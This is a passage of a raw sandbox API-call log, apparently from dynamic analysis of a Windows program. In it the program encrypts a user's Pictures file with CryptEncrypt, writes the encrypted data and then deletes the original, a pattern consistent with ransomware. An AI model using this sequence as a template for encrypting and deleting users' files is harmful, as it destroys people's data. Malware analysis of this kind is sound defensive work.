lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca778, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.145] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xd297, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xd2a0) returned 1 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0089.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0089.147] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0089.148] CharLowerBuffW (in: lpsz="byte[53921]", cchLength=0xb | out: lpsz="byte[53921]") returned 0xb [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd2a1) returned 0x453d7f0 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd297) returned 0x499a008 [0089.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd297) returned 0x49a72a8 [0089.153] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0089.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0089.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca970 [0089.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.154] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453d7f0*, pdwDataLen=0x144e790*=0xd297, dwBufLen=0xd2a0 | out: pbData=0x453d7f0*, pdwDataLen=0x144e790*=0xd2a0) returned 1 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0089.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0089.154] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.155] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xd2a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0xd2a0, lpOverlapped=0x0) returned 1 [0089.157] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0089.157] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca208, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0089.158] CryptDestroyKey (hKey=0x41ac640) returned 1 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.159] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.159] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.159] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0089.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0089.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0089.159] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0089.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0089.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0089.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0089.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.160] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.160] FreeLibrary (hLibModule=0x756e0000) returned 1 [0089.160] CloseHandle (hObject=0x258) returned 1 [0089.160] CloseHandle (hObject=0x298) returned 1 [0089.162] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg", lpFilePart=0x0) returned 0x27 [0089.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0089.163] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ki1iqisuyi.jpg")) returned 0x20 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0089.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0089.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0089.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0089.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0089.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0089.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0089.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0089.164] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24491a80, ftCreationTime.dwHighDateTime=0x1d5e8ab, ftLastAccessTime.dwLowDateTime=0xf883cf30, ftLastAccessTime.dwHighDateTime=0x1d5eb70, ftLastWriteTime.dwLowDateTime=0xf883cf30, ftLastWriteTime.dwHighDateTime=0x1d5eb70, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="KI1iqiSuYI.jpg", cAlternateFileName="KI1IQI~1.JPG")) returned 0x41ac600 [0089.164] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ki1iqisuyi.jpg")) returned 1 [0089.208] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24491a80, ftCreationTime.dwHighDateTime=0x1d5e8ab, ftLastAccessTime.dwLowDateTime=0xf883cf30, ftLastAccessTime.dwHighDateTime=0x1d5eb70, ftLastWriteTime.dwLowDateTime=0xf883cf30, ftLastWriteTime.dwHighDateTime=0x1d5eb70, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="KI1iqiSuYI.jpg", cAlternateFileName="KI1IQI~1.JPG")) returned 0 [0089.208] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0089.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0089.208] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0089.209] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ef0 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0089.209] 